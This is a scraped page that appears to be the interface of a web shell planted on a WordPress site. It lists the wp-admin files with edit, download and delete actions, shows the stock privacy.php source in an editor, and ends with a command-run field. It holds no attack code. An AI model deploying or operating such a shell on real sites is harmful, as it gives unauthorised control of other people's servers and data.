/
home
/
altere25
/
berryglowbeauty.com
/
wp-admin
/
/home/altere25/berryglowbeauty.com/wp-admin
mkdir
upload
Name
Size
Mode
Actions
css/
-
0755
rm
images/
-
0755
rm
includes/
-
0755
rm
js/
-
0755
rm
maint/
-
0755
rm
network/
-
0755
rm
user/
-
0755
rm
about.php
27954
0644
edit
dl
rm
admin-ajax.php
4672
0644
edit
dl
rm
admin-footer.php
2830
0644
edit
dl
rm
admin-functions.php
409
0644
edit
dl
rm
admin-header.php
8214
0644
edit
dl
rm
admin-post.php
1692
0644
edit
dl
rm
admin.php
12139
0644
edit
dl
rm
async-upload.php
3821
0644
edit
dl
rm
comment.php
11009
0644
edit
dl
rm
credits.php
5307
0644
edit
dl
rm
custom-background.php
419
0644
edit
dl
rm
custom-header.php
429
0644
edit
dl
rm
customize.php
9636
0644
edit
dl
rm
edit-comments.php
14198
0644
edit
dl
rm
edit-form-advanced.php
28801
0644
edit
dl
rm
edit-form-blocks.php
13497
0644
edit
dl
rm
edit-form-comment.php
7805
0644
edit
dl
rm
edit-link-form.php
6230
0644
edit
dl
rm
edit-tag-form.php
9519
0644
edit
dl
rm
edit-tags.php
21492
0644
edit
dl
rm
edit.php
17886
0644
edit
dl
rm
erase-personal-data.php
3243
0644
edit
dl
rm
export-personal-data.php
3218
0644
edit
dl
rm
export.php
10943
0644
edit
dl
rm
freedoms.php
4706
0644
edit
dl
rm
import.php
7529
0644
edit
dl
rm
index.php
5901
0644
edit
dl
rm
install-helper.php
5907
0644
edit
dl
rm
install.php
16898
0644
edit
dl
rm
link-add.php
727
0644
edit
dl
rm
link-manager.php
4191
0644
edit
dl
rm
link-parse-opml.php
2604
0644
edit
dl
rm
link.php
2746
0644
edit
dl
rm
load-scripts.php
1709
0644
edit
dl
rm
load-styles.php
2317
0644
edit
dl
rm
media-new.php
3214
0644
edit
dl
rm
media-upload.php
3375
0644
edit
dl
rm
media.php
5609
0644
edit
dl
rm
menu-header.php
9743
0644
edit
dl
rm
menu.php
14486
0644
edit
dl
rm
moderation.php
322
0644
edit
dl
rm
ms-admin.php
211
0644
edit
dl
rm
ms-delete-site.php
4199
0644
edit
dl
rm
ms-edit.php
231
0644
edit
dl
rm
ms-options.php
238
0644
edit
dl
rm
ms-sites.php
230
0644
edit
dl
rm
ms-themes.php
232
0644
edit
dl
rm
ms-upgrade-network.php
234
0644
edit
dl
rm
ms-users.php
230
0644
edit
dl
rm
my-sites.php
4657
0644
edit
dl
rm
nav-menus.php
43841
0644
edit
dl
rm
network.php
5407
0644
edit
dl
rm
options-discussion.php
15312
0644
edit
dl
rm
options-general.php
14951
0644
edit
dl
rm
options-head.php
492
0644
edit
dl
rm
options-media.php
6247
0644
edit
dl
rm
options-permalink.php
18953
0644
edit
dl
rm
options-privacy.php
8087
0644
edit
dl
rm
options-reading.php
9711
0644
edit
dl
rm
options-writing.php
8634
0644
edit
dl
rm
options.php
12192
0644
edit
dl
rm
plugin-editor.php
13366
0644
edit
dl
rm
plugin-install.php
6398
0644
edit
dl
rm
plugins.php
24371
0644
edit
dl
rm
post-new.php
2712
0644
edit
dl
rm
post.php
9664
0644
edit
dl
rm
press-this.php
2404
0644
edit
dl
rm
privacy-policy-guide.php
852
0644
edit
dl
rm
privacy.php
2565
0644
edit
dl
rm
profile.php
298
0644
edit
dl
rm
revision.php
5213
0644
edit
dl
rm
setup-config.php
15908
0644
edit
dl
rm
site-health-info.php
5788
0644
edit
dl
rm
site-health.php
5352
0644
edit
dl
rm
term.php
2264
0644
edit
dl
rm
theme-editor.php
15088
0644
edit
dl
rm
theme-install.php
15213
0644
edit
dl
rm
themes.php
23702
0644
edit
dl
rm
tools.php
3470
0644
edit
dl
rm
update-core.php
33726
0644
edit
dl
rm
update.php
10955
0644
edit
dl
rm
upgrade-functions.php
344
0644
edit
dl
rm
upgrade.php
5560
0644
edit
dl
rm
upload.php
13921
0644
edit
dl
rm
user-edit.php
29254
0644
edit
dl
rm
user-new.php
22285
0644
edit
dl
rm
users.php
19890
0644
edit
dl
rm
widgets.php
19740
0644
edit
dl
rm
Edit:
/home/altere25/berryglowbeauty.com/wp-admin/privacy.php
(2565B)
<?php /** * Privacy administration panel. * * @package WordPress * @subpackage Administration */ /** WordPress Administration Bootstrap */ require_once( dirname( __FILE__ ) . '/admin.php' ); $title = __( 'Privacy' ); list( $display_version ) = explode( '-', get_bloginfo( 'version' ) ); include( ABSPATH . 'wp-admin/admin-header.php' ); ?> <div class="wrap about__container"> <div class="about__header"> <div class="about__header-title"> <h1> <span><?php echo $display_version; ?></span> <?php _e( 'WordPress' ); ?> </h1> </div> <div class="about__header-badge"></div> <div class="about__header-text"> <p> <?php printf( /* translators: %s: The current WordPress version number. */ __( 'Introducing our most refined user experience with the improved block editor in WordPress %s!' ), $display_version ); ?> </p> </div> <nav class="about__header-navigation nav-tab-wrapper wp-clearfix" aria-label="<?php esc_attr_e( 'Secondary menu' ); ?>"> <a href="about.php" class="nav-tab"><?php _e( 'What’s New' ); ?></a> <a href="credits.php" class="nav-tab"><?php _e( 'Credits' ); ?></a> <a href="freedoms.php" class="nav-tab"><?php _e( 'Freedoms' ); ?></a> <a href="privacy.php" class="nav-tab nav-tab-active" aria-current="page"><?php _e( 'Privacy' ); ?></a> </nav> </div> <div class="about__section"> <div class="column"> <h2><?php _e( 'Privacy' ); ?></h2> <p><?php _e( 'From time to time, your WordPress site may send data to WordPress.org — including, but not limited to — the version of WordPress you are using, and a list of installed plugins and themes.' ); ?></p> <p> <?php printf( /* translators: %s: https://wordpress.org/about/stats/ */ __( 'This data is used to provide general enhancements to WordPress, which includes helping to protect your site by finding and automatically installing new updates. It is also used to calculate statistics, such as those shown on the <a href="%s">WordPress.org stats page</a>.' ), __( 'https://wordpress.org/about/stats/' ) ); ?> </p> <p> <?php printf( /* translators: %s: https://wordpress.org/about/privacy/ */ __( 'We take privacy and transparency very seriously. To learn more about what data we collect, and how we use it, please visit <a href="%s">WordPress.org/about/privacy</a>.' ), __( 'https://wordpress.org/about/privacy/' ) ); ?> </p> </div> </div> </div> <?php include( ABSPATH . 'wp-admin/admin-footer.php' ); ?>
Save
cmd:
run